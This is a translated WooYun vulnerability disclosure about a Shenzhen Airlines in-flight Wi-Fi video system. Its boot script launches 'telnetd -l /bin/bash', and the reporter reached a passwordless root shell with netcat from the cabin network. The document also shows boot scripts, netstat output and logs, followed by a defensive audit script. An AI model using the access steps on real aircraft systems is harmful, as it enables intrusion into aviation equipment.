
Vulnerability summary

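Bug ID: wooyun-2015-0143525

Title: The Yuntu (云图) in-flight Wi-Fi on a Shenzhen Airlines aircraft has a backdoor that allows control of the video-on-demand system (under certain conditions the internal network can be reached)

Vendor: Shenzhen Airlines (深圳航空)

Author: 路人甲

Submitted: 2015-09-26 01:37

Fixed: 2015-11-10 14:00

Disclosed: 2015-11-10 14:00

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]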



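Vulnerability details

Disclosure status:

2015-09-26: Details reported to the vendor, awaiting vendor handling
2015-09-26: Confirmed by the vendor; details disclosed to the vendor only
2015-10-06: Details disclosed to core white hats and relevant domain experts
2015-10-16: Details disclosed to regular white hats
2015-10-26: Details disclosed to trainee white hats
2015-11-10: Details disclosed to the public

Brief description:

Got bored on the flight.

Detailed description:

After connecting to Shenzhen Airlines' Yuntu Wi-Fi, I found I was on a network that accesses Yuntu via 192.168.2.99.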

nc -vv 192.168.2.2 23
found 0 associations
found 1 connections:
1:flags=82<CONNECTED,PREFERRED>
outif en0
src 192.168.2.88 port 59300
dst 192.168.2.2 port 23
rank info not available
TCP aux info available
Connection to 192.168.2.2 port 23 [tcp/telnet] succeeded!
????????
bash-3.00#


What the heck is this, it just connects straight in?

netstat -an
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8554 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8300 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 192.168.2.2:8080 192.168.2.99:60361 TIME_WAIT
tcp 0 0 192.168.2.2:8080 192.168.2.99:60440 TIME_WAIT
tcp 0 0 192.168.2.2:8080 192.168.2.99:60726 TIME_WAIT
tcp 0 0 192.168.2.2:42675 192.168.2.99:7890 ESTABLISHED
tcp 0 547 192.168.2.2:23 192.168.2.88:59300 ESTABLISHED
tcp 0 0 192.168.2.2:8080 192.168.2.99:60519 TIME_WAIT
tcp 0 0 192.168.2.2:38879 192.168.2.99:8911 ESTABLISHED
tcp 0 0 192.168.2.2:42679 192.168.2.99:7890 ESTABLISHED
tcp 0 0 192.168.2.2:8080 192.168.2.99:60596 TIME_WAIT
tcp 0 0 192.168.2.2:38878 192.168.2.99:8911 ESTABLISHED
tcp 0 0 192.168.2.2:8080 192.168.2.99:60663 TIME_WAIT


Let's look at the code

cat *.sh
cat *.sh
#!/bin/sh
echo "================Enter runapp.sh========================="
#start the telnetd service;
telnetd -l /bin/bash
cp /tango/pointercal /etc
#insmod the sata/usb ko
modprobe sata_tango3
modprobe tangox-ehci-hcd
modprobe usb-storage
echo "================Build /tmp/sda2 directory========================="
mkdir /tmp/sda2
mkdir /tmp/sda3
mkdir /mnt/sdk
mkdir /mnt/nfs
mount /dev/sda2 /tmp/sda2
mount /dev/sda3 /tmp/sda3
/tmp/sda2/avod/AppStart.sh
cat /tmp/sda2/avod/AppStart.sh
cat /tmp/sda2/avod/AppStart.sh
#!/bin/sh
if [ ! -d "/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/" ]; then
mkdir /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/ -p
fi
#firmware
if [ -d "/tmp/sda2/newfw" ] && [ -d "/tmp/sda2/newfw/release/avod" ] &&
[ -d "/tmp/sda2/newfw/sdk" ] && [ -d "/tmp/sda2/newfw/release/mini_httpd" ] &&
[ -d "/tmp/sda2/newfw/release/wwwroot" ] ;then
#&& [ -d "/tmp/sda2/newfw/sdkavod" ]
echo "Found new firmware..."

rm /tmp/sda2/avod -rf
mv /tmp/sda2/newfw/release/avod /tmp/sda2/ -f
chmod 777 /tmp/sda2/avod -R

if [ -d "/tmp/sda2/newfw/release/conf" ] ;then
rm /tmp/sda2/conf -rf
mv /tmp/sda2/newfw/release/conf /tmp/sda2/conf -f
chmod 777 /tmp/sda2/conf -R
fi

rm /tmp/sda2/sdk -rf
mv /tmp/sda2/newfw/sdk /tmp/sda2/ -f

#Only for Browser upgrade
if [ -d "/tmp/sda2/newfw/sdkavod" ] ;then
rm /tmp/sda2/sdkavod/install -rf
rm /tmp/sda2/sdkavod/lib -rf
mv /tmp/sda2/newfw/sdkavod/install/ /tmp/sda2/sdkavod/ -f
mv /tmp/sda2/newfw/sdkavod/lib/ /tmp/sda2/sdkavod/ -f
fi

# rm /tmp/sda2/sdkavod -rf
# mv /tmp/sda2/newfw/sdkavod /tmp/sda2/ -f
rm /tmp/sda3/mini_httpd -rf
mv /tmp/sda2/newfw/release/mini_httpd /tmp/sda3/mini_httpd
chmod 777 /tmp/sda3/mini_httpd -R

rm /tmp/sda3/wwwroot -rf
mv /tmp/sda2/newfw/release/wwwroot /tmp/sda3/wwwroot
chmod 777 /tmp/sda3/wwwroot -R

rm /tmp/sda2/newfw -rf
sync

if [ ! -d "/tango/conf/" ] ;then
mkdir /tango/conf -p
fi

if [ -f "/tmp/sda2/update/system_version_info.xml" ] ;then
cp /tmp/sda2/update/system_version_info.xml /tango/conf -f
else
echo "--->>ERR:can not find system version file"
fi
#add update kernel
echo "begin to update firmware!"
/tmp/sda2/avod/updatefirmware.sh
source /tango/release/runapp.sh
echo "Firwmare update success!"
exit
fi
cd /tmp/sda2/sdkavod/mrua
source run.env
fw_reload
#mkdir /home/antony
ln -s /tmp/sda2/sdkavod/lib /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib
ln -s /tmp/sda2/sdkavod/install /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/install
export LD_LIBRARY_PATH=/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib:$LD_LIBRARY_PATH
#for cmt smartlcd
#cp /tmp/sda2/avod/libdrvMrua_usb_cmt.so /lib/libdrvMrua.so
cp /tmp/sda2/avod/libdrvMrua_12inch.so /lib/libdrvMrua.so
#cp log lib
echo "copy log lib"
cp /tmp/sda2/avod/liblog.so /lib/ -f
cp /tmp/sda2/avod/libcurl.so.4 /lib/ -f
export QWS_DISPLAY=linuxfb
export QWS_SIZE=1280x800
export QWS_MOUSE_PROTO=linuxtp
cd /tmp/sda2/sdkavod/dcchd_SMP8652_3_8_2_black.mips/
source trun.env
cd /tmp/sda2/avod
# for cmt
ln -sf PD035Vx2.vmf.cmt PD035Vx2.vmf
#leib++ for parse the ipaddr from the /tango/avod/ipaddr.cfg
#/tmp/sda2/avod/ipconfig.sh
#udhcpc -q&
#use fixed ip 192.168.2.2
/sbin/ifconfig eth0 192.168.2.2 up
/tmp/sda3/mini_httpd/sbin/mini_httpd -C /tmp/sda3/mini_httpd/mini.conf &
echo "starting control module ....."
/tmp/sda2/avod/control_module &
sleep 10
route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0
sleep 5
echo "starting play_sub_module ....."
/tmp/sda2/avod/play_sub_module &
sleep 10
echo "starting browser ....."
/tmp/sda2/avod/browser -size 1280x800 -qws http://127.0.0.1/cmt_welcome/welcome.html &
cp -rf /tmp/sda2/avod/ppp /etc/
cp -rf /tmp/sda2/avod/ppp/resolv.conf /etc/
cp -f /tmp/sda2/avod/pppd /usr/sbin
cp -f /tmp/sda2/avod/chat /usr/sbin
route del -net default
sleep 5
echo "start 3g_control module"
/tmp/sda2/avod/3g_control&
sleep 10
echo "starting cmt_cma_module ....."
/tmp/sda2/avod/cmt_cma_module &
echo "starting pcu_comm_module ....."
/tmp/sda2/avod/pcu_comm_module &
echo "starting upgradeModule ....."
/tmp/sda2/avod/upgradeModule &
echo "starting cmt_suu ....."
/tmp/sda2/avod/cmt_suu &
#add by hirry for ftpd
echo "star ftpd ....."
/tmp/sda2/avod/ftp/autoftpd.sh
#end by hirry for ftpd
sleep 5
modprobe snd_seq_oss
modprobe snd_pcm_oss
sleep 2
echo "starting wis-streamer ...."
/tmp/sda2/avod/wis-streamer -pcm -nv &
#cp /tmp/sda2/avod/resolv.conf /etc/ -f
LD_LIBRARY_PATH=/lib:/usr/lib/:/usr/local/lib:$LD_LIBRARY_PATH
echo "Starting logmodule ......"
/tmp/sda2/avod/logmodule_cmt &
echo "Starting bitemodule ....."
/tmp/sda2/avod/bitemodule_cmt &
echo "Starting proxysyn_mips..."
/tmp/sda2/avod/proxysyn_mips &
#echo "Starting neusoft dldir..."
#/tmp/sda3/wwwroot/neusoft/ok/dldir/dldir &
echo "Starting nginx..."
/tmp/sda3/wwwroot/nginx/sbin/nginx -p /tmp/sda3/wwwroot/nginx/ &
echo "all application booted ....."
find /tmp/sda2/avod/logs -mtime +15 -name "*log" -exec rm -f {} \;
#add copy kernel
/tmp/sda2/avod/copykernel.sh&
killall mini_httpd


So it really is a VOD (video-on-demand) system. Also, judging from the logs, at certain times it can reach the 10.x network.

192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/download/20150923000001024616.d.icup HTTP/1.1" 206 358560 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/checkFileSize/20150923000001024615.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:09 +0800] "GET /Air/checkFileSize/20150923000001024616.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/download/20150923000001024617.d.icup HTTP/1.1" 206 163522 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/checkFileSize/20150923000001024617.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024617.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:12 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024615.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:13 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024616.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:41 +0800] "GET /Air/download/20150923000001024619.d.icup HTTP/1.1" 206 343755 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:42 +0800] "GET /Air/download/20150923000001024618.d.icup HTTP/1.1" 206 540360 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024619.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024618.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:45 +0800] "GET /Air/download/20150923000001024620.d.icup HTTP/1.1" 206 452793 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:46 +0800] "GET /Air/checkFileSize/20150923000001024620.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:47 +0800] "GET /Air/download/20150923000001024622.d.icup HTTP/1.1" 206 98965 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024620.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "GET /Air/checkFileSize/20150923000001024622.d.icup HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"


Proof of vulnerability:

telnetd -l /bin/bash

Is this a backdoor?

Fix:

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
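An added example, not part of the original report or the device's code: `telnetd -l /bin/bash` replaces the login program with a shell, so anyone who reaches port 23 gets a shell without a password prompt. The sketch below audits a boot script and a `netstat -an` capture for that pattern, for world-writable `chmod` modes, and for telnet/FTP listeners on all interfaces. The function names and the sample files are constructed for illustration, using lines shown above.

```shell
#!/bin/sh
# Added example, not from the report or the device; function names are hypothetical.

# Flag risky boot-script lines; prints <line-no>:<FINDING>:<source line>.
audit_boot_script() {
    awk '
        /^[ \t]*#/ { next }                       # ignore commented-out lines
        {
            for (i = 1; i <= NF; i++) {
                n = split($i, part, "/")
                if (part[n] != "telnetd") continue
                # "-l <shell>" swaps the login program for a shell: no password prompt
                kind = "TELNETD_CLEARTEXT"
                for (j = i + 1; j < NF; j++)
                    if ($j == "-l" && $(j + 1) ~ /sh$/) kind = "TELNETD_NO_LOGIN"
                printf "%d:%s:%s\n", NR, kind, $0
            }
        }
        # chmod with the others-write bit set (e.g. 777) on paths executed at boot
        $1 == "chmod" {
            for (i = 2; i <= NF; i++)
                if ($i ~ /^[0-7]?[0-7][0-7][2367]$/)
                    printf "%d:WORLD_WRITABLE:%s\n", NR, $0
        }
    ' "$1"
}

# Telnet/FTP listeners bound to every interface in `netstat -an` output; prints ports.
exposed_admin_ports() {
    awk '$NF == "LISTEN" && $4 ~ /^0\.0\.0\.0:(21|23)$/ { sub(/.*:/, "", $4); print $4 }' "$1"
}

# Constructed sample files built from lines shown in the report above.
sample_dir=$(mktemp -d)
cat > "$sample_dir/runapp.sh" <<'EOF'
#start the telnetd service;
telnetd -l /bin/bash
chmod 777 /tmp/sda2/avod -R
EOF
cat > "$sample_dir/netstat.txt" <<'EOF'
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 547 192.168.2.2:23 192.168.2.88:59300 ESTABLISHED
EOF
audit_boot_script "$sample_dir/runapp.sh"
exposed_admin_ports "$sample_dir/netstat.txt"
```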


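Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-26 13:59

Vendor reply:

Thank you for your concern for Shenzhen Airlines' information systems. We have assigned staff to fix this.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-09-26 12:16 | 草榴社区 ( Regular white hat | Rank:109 Vulnerabilities:26 | Under 18, no entry.)

    Shenzhen Airlines is that impressive? They even have Wi-Fi.

  2. 2015-09-26 18:34 | Yang ( Regular white hat | Rank:315 Vulnerabilities:102 | As a newbie, what do I do if my Dami phone gets smashed?)

    Rich, you actually got to fly on a plane.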